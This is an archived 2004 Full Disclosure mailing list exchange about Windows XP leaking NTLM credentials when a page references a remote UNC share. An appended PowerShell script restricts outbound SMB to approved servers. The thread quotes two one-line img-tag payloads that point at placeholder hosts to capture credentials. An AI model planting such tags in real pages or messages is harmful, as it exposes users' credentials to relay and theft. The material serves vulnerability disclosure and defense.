Full Disclosure mailing list archives

Re[2]: Automatically passing NTLM authentication credentials on Windows XP


From: 3APA3A <3APA3A () SECURITY NNOV RU>
Date: Wed, 29 Sep 2004 10:52:42 +0400

Dear Hidenobu Seki,

HS> Tell me why Microsoft issued patches for MS00-067(KB272743) and
HS> MS01-001(KB282132) but not for "img src". > 3APA3A or all

I have the same question. I had a discussion on this topic with the Microsoft
security team again just a few weeks ago (and 2 more discussions during the
last 4 years). They accepted this problem and have re-opened the case
(MSRC 5468lw) but gave no timelines for a solution. I think MS doesn't
understand the problem completely. For example, they still believe SMB
signing prevents NTLM relaying attacks, while SMB signing doesn't prevent
even the simplest port redirection, because the IP address is not signed.

Currently there is no way to mitigate this problem except filtering
outgoing NetBIOS and CIFS requests by implementing a domain-wide IP
Security policy to allow SMB and CIFS communication only with file
servers/domain controllers (if somebody is interested I can publish
step-by-step instructions, but I believe MS should publish a KB article to
describe this configuration).

I don't think the problem reported by you is a different issue; it's just
another exploit scenario for the same problem. I know a few more tricks to
redirect a user to a UNC share.

--Wednesday, September 29, 2004, 5:43:15 AM, you wrote to 3APA3A () SECURITY NNOV RU:

From: 3APA3A <3APA3A () SECURITY NNOV RU>

This problem has been known since at least 1997 and can still be exploited
with <IMG SRC="\\w.x.y.z\fakeshare\fakefile"> without any MS Word
document.

HS> It is not true.
HS> They are different problems that produce the same phenomenon.

HS> Mr. Cesar Cerrudo taught me that <img src=file://\\www.xxx.yyy\test>
HS> still works.

HS> Tell me why Microsoft issued patches for MS00-067(KB272743) and 
HS> MS01-001(KB282132) but not for "img src". > 3APA3A or all

HS> Kind regards,
HS> Urity




-- 
~/ZARAZA
A new type of elementary particle has been discovered: shkvarki (cracklings).
Not very big, slightly burnt.  (Lem)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
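The mitigation 3APA3A describes above (filter outgoing NetBIOS/CIFS so a workstation only talks SMB to approved file servers and domain controllers, so that an <IMG SRC="\\attacker\share"> reference cannot make it send NTLM credentials anywhere else) was, in 2004, a domain-wide IPsec policy. The script below is an added example, not from the original message or from Microsoft; it implements the same allow-list idea with Windows Defender Firewall outbound rules on a current Windows host (assumed: the NetSecurity PowerShell module, an elevated shell). Because Windows Firewall gives block rules precedence over allow rules, the allow list is expressed as a block rule whose remote-address set is the complement of the approved servers. The server addresses are constructed placeholders.

```powershell
# Added example: restrict outbound SMB (TCP 445 direct-hosted CIFS and TCP 139 NetBIOS
# session) to an approved set of file servers / domain controllers. Windows Firewall has
# no "block everything except" option, so we compute the IPv4 ranges that are NOT in the
# approved list and hand that complement to a single outbound Block rule.

# Constructed sample values: replace with your real file servers / domain controllers.
$ApprovedSmbServers = @('10.10.0.5', '10.10.0.6', '10.20.1.20')

function ConvertTo-UInt32 ([string]$Ip) {
    # Dotted-quad -> host-order unsigned integer
    $b = [System.Net.IPAddress]::Parse($Ip).GetAddressBytes()
    [Array]::Reverse($b)
    return [BitConverter]::ToUInt32($b, 0)
}

function ConvertFrom-UInt32 ([uint32]$N) {
    # Host-order unsigned integer -> dotted-quad
    $b = [BitConverter]::GetBytes($N)
    [Array]::Reverse($b)
    return ([System.Net.IPAddress]::new($b)).ToString()
}

function Get-ComplementRanges ([string[]]$Allowed) {
    # Returns "a.b.c.d-e.f.g.h" range strings covering every IPv4 address except $Allowed.
    $sorted = $Allowed | ForEach-Object { ConvertTo-UInt32 $_ } | Sort-Object -Unique
    $ranges = @()
    [uint64]$next = 0                      # first address not yet covered
    foreach ($a in $sorted) {
        if ($a -gt $next) {
            $ranges += ('{0}-{1}' -f (ConvertFrom-UInt32 $next), (ConvertFrom-UInt32 ($a - 1)))
        }
        $next = [uint64]$a + 1
    }
    if ($next -le [uint32]::MaxValue) {
        $ranges += ('{0}-{1}' -f (ConvertFrom-UInt32 $next), '255.255.255.255')
    }
    return $ranges
}

# Remove earlier copies of our rule so the script can be re-run after editing the list.
Get-NetFirewallRule -DisplayName 'Restrict outbound SMB*' -ErrorAction SilentlyContinue |
    Remove-NetFirewallRule

$complement = Get-ComplementRanges $ApprovedSmbServers
Write-Host "Blocking outbound SMB to: $($complement -join ', ')"

New-NetFirewallRule -DisplayName 'Restrict outbound SMB (block non-approved hosts)' `
    -Description 'Prevents NTLM credential leakage to arbitrary UNC paths (img src, UNC links)' `
    -Direction Outbound -Protocol TCP -RemotePort 445, 139 `
    -RemoteAddress $complement -Action Block -Profile Any | Out-Null

# Quick self-check: show the rule's address filter as the firewall stored it.
Get-NetFirewallRule -DisplayName 'Restrict outbound SMB*' | Get-NetFirewallAddressFilter
```

Two practical notes. First, the rule covers the two SMB session transports only; if you also want to filter the NetBIOS name and datagram services (UDP 137/138) as the message's "outgoing NetBIOS" wording suggests, add a matching UDP rule, but test it first because it also stops NetBIOS broadcast name resolution on the local subnet. Second, as 3APA3A points out about SMB signing, this control keys on the destination IP address, so a relay through a host that is itself on the approved list is not prevented; the approved list should therefore contain only servers you administer.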

